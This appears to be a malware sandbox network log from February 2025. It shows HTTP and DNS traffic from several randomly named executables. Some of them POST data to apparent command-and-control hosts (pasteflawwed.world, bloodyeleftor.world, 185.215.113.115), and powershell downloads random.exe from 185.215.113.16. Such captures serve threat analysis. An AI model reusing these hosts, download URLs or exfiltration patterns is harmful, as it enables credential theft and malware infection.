                                                            95.217.24.123:443
                                                            Request
                                                            POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----mozcb1d2nop8qiekfkfk
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                            Host: 95.217.24.123
                                                            Content-Length: 63273
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            1b80ca21fe.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=G52IICTJ7DW752F4F
                                                            Cookie: __cf_mw_byp=f1aLY_qoXLvdP19ZxDf8TC70FMN339tAHqm4Vmr5jNg-1740060535-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1110
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=t8sgcr2c952h3t999a92jplmsh; expires=Fri, 21 Feb 2025 14:08:58 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2YkQCm%2B4hQdmOAobnkW7jL%2FS%2FuyTZ6U%2BLfC2i2CSQeVTp3brpPUa5MBU1AhwJjXuXZT04FFaz7U6HAolS5zs1UKIVkpMpX5Ahklz4HLW9h0tnBKOl5jEfQRglwxG2A8bqsQnDo%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f125cfed18e49-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22310&min_rtt=21063&rtt_var=6455&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=1802&delivery_rate=158318&cwnd=253&unsent_bytes=0&cid=f4099beb3dc287d5&ts=633&x=0"
                                                          • flag-us
                                                            DNS
                                                            steamcommunity.com
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            steamcommunity.com
                                                            IN A
                                                            Response
                                                            steamcommunity.com
                                                            IN A
                                                            104.82.234.109
                                                          • flag-gb
                                                            GET
                                                            https://steamcommunity.com/profiles/76561199822375128
                                                            3e0505c684.exe
                                                            Remote address:
                                                            104.82.234.109:443
                                                            Request
                                                            GET /profiles/76561199822375128 HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Host: steamcommunity.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;
                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                            Cache-Control: no-cache
                                                            Date: Thu, 20 Feb 2025 14:08:59 GMT
                                                            Content-Length: 35769
                                                            Connection: keep-alive
                                                            Set-Cookie: sessionid=96d651568636c54d21f8b7d4; Path=/; Secure; SameSite=None
                                                            Set-Cookie: steamCountry=GB%7Cdcacbc5cf7f4b2dc1ed43dd213cf0dc5; path=/; secure; HttpOnly; SameSite=None
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.115/
                                                            716ddbb44f.exe
                                                            Remote address:
                                                            185.215.113.115:80
                                                            Request
                                                            GET / HTTP/1.1
                                                            Host: 185.215.113.115
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:59 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-ru
                                                            POST
                                                            http://185.215.113.115/c4becf79229cb002.php
                                                            716ddbb44f.exe
                                                            Remote address:
                                                            185.215.113.115:80
                                                            Request
                                                            POST /c4becf79229cb002.php HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
                                                            Host: 185.215.113.115
                                                            Content-Length: 211
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:59 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 8
                                                            Keep-Alive: timeout=5, max=99
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-us
                                                            POST
                                                            https://bloodyeleftor.world/api
                                                            3e0505c684.exe
                                                            Remote address:
                                                            104.21.63.231:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: bloodyeleftor.world
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:08:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=57qzLmnmYxDuC%2F42ASrohKMmOstLFFVENeHNBSYhQAD9oqZQi195aNZvD4zUuBXMH0h2EDnpamcMZQ0IAhOxE%2FAVyYjFwXuVdqpymqbn7CXizJweNx0xQoTkqtclG%2BHsaOsDPE%2Fl"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f1263beebecfd-LHR
                                                          • flag-us
                                                            POST
                                                            https://bloodyeleftor.world/api
                                                            3e0505c684.exe
                                                            Remote address:
                                                            104.21.63.231:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=4kDs3TMHMEfFNRXK.bIlpGQPNywNp20SfDAUKH5pvI4-1740060539-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 45
                                                            Host: bloodyeleftor.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=tjt7m8qjkitpr9tqpkd0scr4lf; expires=Fri, 21 Feb 2025 14:08:59 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=srKtte9wIq8l6b%2Bpq0%2FKSEdPas95z15ApjCyp%2BcXg74piEjw1BcBCIJDeFkjrVahICy4jfHXTh%2Bl72d49q2NwjK5IPCcvN9W2%2FefXeEp3166Wn6UYYFTt3DO7w7toLLqUtRpoe%2Fy"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f126498ceecfd-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21889&min_rtt=20916&rtt_var=2815&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8139&recv_bytes=1061&delivery_rate=371950&cwnd=257&unsent_bytes=0&cid=75d84bd4ff8d2b47&ts=320&x=0"
                                                          • flag-us
                                                            POST
                                                            https://bloodyeleftor.world/api
                                                            3e0505c684.exe
                                                            Remote address:
                                                            104.21.63.231:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=MGD1JJAWCO
                                                            Cookie: __cf_mw_byp=4kDs3TMHMEfFNRXK.bIlpGQPNywNp20SfDAUKH5pvI4-1740060539-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1579
                                                            Host: bloodyeleftor.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=i692ub11q2nsmc1t03g96f1i2m; expires=Fri, 21 Feb 2025 14:09:00 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qy4%2B6%2Bu7m58gCzlfQ%2F%2BO3Ct2Fq6N2hIAAB0sfRi3EQ35ld0ovkmUlUjcFyWacK9qZCfkHL3DYzkRwhp2IGA1Bn8F8Qz6buaYfxdL34lZg%2FJd%2FzF6dYDtitOIuYbiRC6g1ufDSOPy"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f12669e63ecfd-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21723&min_rtt=20405&rtt_var=2443&sent=17&recv=16&lost=0&retrans=0&sent_bytes=9317&recv_bytes=3071&delivery_rate=371950&cwnd=257&unsent_bytes=0&cid=75d84bd4ff8d2b47&ts=685&x=0"
                                                          • flag-us
                                                            POST
                                                            https://bloodyeleftor.world/api
                                                            3e0505c684.exe
                                                            Remote address:
                                                            104.21.63.231:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=62UPS33GHYE1G
                                                            Cookie: __cf_mw_byp=4kDs3TMHMEfFNRXK.bIlpGQPNywNp20SfDAUKH5pvI4-1740060539-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1079
                                                            Host: bloodyeleftor.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=kg0iqmt9bp2db1c99gocs8orld; expires=Fri, 21 Feb 2025 14:09:01 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HBHOimzqU4C9xBBIaFNvuhTq5%2Fx7lvm2DryYTyAEoSFdhY%2Fy7pOGwzjtJBHLigDbda2N7ZjG6pmCAeingWqZlROGyqNk7sJE1XtDb8nZhPMuyQoYqSbt%2BReYaS4pWyYYz%2BPj7U2Z"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f126dfacd77b7-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22495&min_rtt=20955&rtt_var=6358&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2867&recv_bytes=1771&delivery_rate=159954&cwnd=250&unsent_bytes=0&cid=045c6e4c2c3b57ac&ts=296&x=0"
                                                          • flag-us
                                                            POST
                                                            https://bloodyeleftor.world/api
                                                            3e0505c684.exe
                                                            Remote address:
                                                            104.21.63.231:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=4kDs3TMHMEfFNRXK.bIlpGQPNywNp20SfDAUKH5pvI4-1740060539-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 80
                                                            Host: bloodyeleftor.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=e8m378d68gk83ue0rsolt9ujtn; expires=Fri, 21 Feb 2025 14:09:01 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6oibeWjut4ASBE%2B1ky37l0lLCFUnvdblO0jDclewXJ8Rx%2ByaP15CBXSOku1x9VqfQvdgnFX5mrDG5q0KLBotVSpJdrE7A%2Fe%2BvGxR04T%2FsOBMo%2BMbhI1mSjtMaBlSHdyGxU9R2S9L"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f12715e5b77b7-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21877&min_rtt=20888&rtt_var=6132&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2866&recv_bytes=763&delivery_rate=164837&cwnd=250&unsent_bytes=0&cid=b1d2dd94294d5abd&ts=229&x=0"
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.16/mine/random.exe
                                                            powershell.exe
                                                            Remote address:
                                                            185.215.113.16:80
                                                            Request
                                                            GET /mine/random.exe HTTP/1.1
                                                            Host: 185.215.113.16
                                                            Connection: Keep-Alive
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:09:03 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2158592
                                                            Last-Modified: Thu, 20 Feb 2025 13:33:20 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b72f20-20f000"
                                                            Accept-Ranges: bytes
                                                          • flag-us
                                                            DNS
                                                            youtube.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            youtube.com
                                                            IN A
                                                            Response
                                                            youtube.com
                                                            IN A
                                                            142.250.179.238
                                                          • flag-us
                                                            DNS
                                                            getpocket.cdn.mozilla.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            getpocket.cdn.mozilla.net
                                                            IN A
                                                            Response
                                                            getpocket.cdn.mozilla.net
                                                            IN CNAME
                                                            getpocket-cdn.prod.mozaws.net
                                                            getpocket-cdn.prod.mozaws.net
                                                            IN CNAME
                                                            prod.pocket.prod.cloudops.mozgcp.net
                                                            prod.pocket.prod.cloudops.mozgcp.net
                                                            IN A
                                                            34.120.5.221
                                                          • flag-us
                                                            DNS
                                                            spocs.getpocket.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            spocs.getpocket.com
                                                            IN A
                                                            Response
                                                            spocs.getpocket.com
                                                            IN CNAME
                                                            prod.ads.prod.webservices.mozgcp.net
                                                            prod.ads.prod.webservices.mozgcp.net
                                                            IN A
                                                            34.117.188.166
                                                          • flag-gb
                                                            GET
                                                            https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                                            firefox.exe
                                                            Remote address:
                                                            142.250.179.238:443
                                                            Request
                                                            GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                                                            host: youtube.com
                                                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                                                            accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            accept-language: en-US,en;q=0.5
                                                            accept-encoding: gzip, deflate, br
                                                            upgrade-insecure-requests: 1
                                                            sec-fetch-dest: document
                                                            sec-fetch-mode: navigate
                                                            sec-fetch-site: none
                                                            sec-fetch-user: ?1
                                                            te: trailers
                                                          • flag-gb
                                                            GET
                                                            https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                                                            firefox.exe
                                                            Remote address:
                                                            142.250.179.238:443
                                                            Request
                                                            GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                                                            host: www.youtube.com
                                                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                                                            accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            accept-language: en-US,en;q=0.5
                                                            accept-encoding: gzip, deflate, br
                                                            upgrade-insecure-requests: 1
                                                            sec-fetch-dest: document
                                                            sec-fetch-mode: navigate
                                                            sec-fetch-site: none
                                                            sec-fetch-user: ?1
                                                            te: trailers
                                                          • flag-us
                                                            DNS
                                                            youtube.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            youtube.com
                                                            IN A
                                                            Response
                                                            youtube.com
                                                            IN A
                                                            142.250.179.238
                                                          • flag-us
                                                            DNS
                                                            prod.ads.prod.webservices.mozgcp.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            prod.ads.prod.webservices.mozgcp.net
                                                            IN A
                                                            Response
                                                            prod.ads.prod.webservices.mozgcp.net
                                                            IN A
                                                            34.117.188.166
                                                          • flag-us
                                                            DNS
                                                            shavar.prod.mozaws.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            shavar.prod.mozaws.net
                                                            IN A
                                                            Response
                                                            shavar.prod.mozaws.net
                                                            IN A
                                                            34.209.7.244
                                                            shavar.prod.mozaws.net
                                                            IN A
                                                            34.208.172.229
                                                            shavar.prod.mozaws.net
                                                            IN A
                                                            52.24.11.115
                                                          • flag-us
                                                            DNS
                                                            prod.ads.prod.webservices.mozgcp.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            prod.ads.prod.webservices.mozgcp.net
                                                            IN AAAA
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            youtube.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            youtube.com
                                                            IN AAAA
                                                            Response
                                                            youtube.com
                                                            IN AAAA
                                                            2a00:1450:4009:81d::200e
                                                          • flag-us
                                                            DNS
                                                            shavar.prod.mozaws.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            shavar.prod.mozaws.net
                                                            IN AAAA
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            prod.content-signature-chains.prod.webservices.mozgcp.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            prod.content-signature-chains.prod.webservices.mozgcp.net
                                                            IN A
                                                            Response
                                                            prod.content-signature-chains.prod.webservices.mozgcp.net
                                                            IN A
                                                            34.160.144.191
                                                          • flag-us
                                                            DNS
                                                            prod.content-signature-chains.prod.webservices.mozgcp.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            prod.content-signature-chains.prod.webservices.mozgcp.net
                                                            IN AAAA
                                                            Response
                                                            prod.content-signature-chains.prod.webservices.mozgcp.net
                                                            IN AAAA
                                                            2600:1901:0:92a9::
                                                          • flag-us
                                                            DNS
                                                            prod.pocket.prod.cloudops.mozgcp.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            prod.pocket.prod.cloudops.mozgcp.net
                                                            IN A
                                                            Response
                                                            prod.pocket.prod.cloudops.mozgcp.net
                                                            IN A
                                                            34.120.5.221
                                                          • flag-us
                                                            DNS
                                                            prod.pocket.prod.cloudops.mozgcp.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            prod.pocket.prod.cloudops.mozgcp.net
                                                            IN AAAA
                                                            Response
                                                            prod.pocket.prod.cloudops.mozgcp.net
                                                            IN AAAA
                                                            2600:1901:0:524c::
                                                          • flag-us
                                                            DNS
                                                            prod.remote-settings.prod.webservices.mozgcp.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            prod.remote-settings.prod.webservices.mozgcp.net
                                                            IN A
                                                            Response
                                                            prod.remote-settings.prod.webservices.mozgcp.net
                                                            IN A
                                                            34.149.100.209
                                                          • flag-us
                                                            DNS
                                                            prod.remote-settings.prod.webservices.mozgcp.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            prod.remote-settings.prod.webservices.mozgcp.net
                                                            IN AAAA
                                                            Response
                                                            prod.remote-settings.prod.webservices.mozgcp.net
                                                            IN AAAA
                                                            2600:1901:0:c47c::
                                                          • flag-us
                                                            GET
                                                            https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                                                            firefox.exe
                                                            Remote address:
                                                            34.120.5.221:443
                                                            Request
                                                            GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                                                            host: getpocket.cdn.mozilla.net
                                                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                                                            accept: */*
                                                            accept-language: en-US,en;q=0.5
                                                            accept-encoding: gzip, deflate, br
                                                            sec-fetch-dest: empty
                                                            sec-fetch-mode: cors
                                                            sec-fetch-site: cross-site
                                                            if-none-match: W/"5388-z4f7VxffVE065aqbcDCq/QMZNSc"
                                                            te: trailers
                                                          • flag-us
                                                            DNS
                                                            www.youtube.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            www.youtube.com
                                                            IN A
                                                            Response
                                                            www.youtube.com
                                                            IN CNAME
                                                            youtube-ui.l.google.com
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.180.14
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.178.14
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            172.217.169.14
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            216.58.204.78
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            216.58.212.206
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.187.238
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            172.217.16.238
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            216.58.201.110
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.200.14
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.187.206
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            172.217.169.78
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.200.46
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            216.58.213.14
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.179.238
                                                          • flag-us
                                                            DNS
                                                            youtube-ui.l.google.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            Response
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.179.238
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.200.14
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.180.14
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            216.58.201.110
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            172.217.16.238
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            216.58.213.14
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            216.58.212.206
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.178.14
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.187.238
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            172.217.169.78
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            216.58.204.78
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.187.206
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            142.250.200.46
                                                            youtube-ui.l.google.com
                                                            IN A
                                                            172.217.169.14
                                                          • flag-us
                                                            DNS
                                                            youtube-ui.l.google.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            youtube-ui.l.google.com
                                                            IN AAAA
                                                            Response
                                                            youtube-ui.l.google.com
                                                            IN AAAA
                                                            2a00:1450:4009:81d::200e
                                                            youtube-ui.l.google.com
                                                            IN AAAA
                                                            2a00:1450:4009:817::200e
                                                            youtube-ui.l.google.com
                                                            IN AAAA
                                                            2a00:1450:4009:80a::200e
                                                            youtube-ui.l.google.com
                                                            IN AAAA
                                                            2a00:1450:4009:819::200e
                                                          • flag-us
                                                            DNS
                                                            consent.youtube.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            consent.youtube.com
                                                            IN A
                                                            Response
                                                            consent.youtube.com
                                                            IN A
                                                            216.58.201.110
                                                          • flag-us
                                                            DNS
                                                            firefox-settings-attachments.cdn.mozilla.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            firefox-settings-attachments.cdn.mozilla.net
                                                            IN A
                                                            Response
                                                            firefox-settings-attachments.cdn.mozilla.net
                                                            IN CNAME
                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                                            IN A
                                                            34.107.152.202
                                                          • flag-gb
                                                            GET
                                                            https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                                            firefox.exe
                                                            Remote address:
                                                            216.58.201.110:443
                                                            Request
                                                            GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
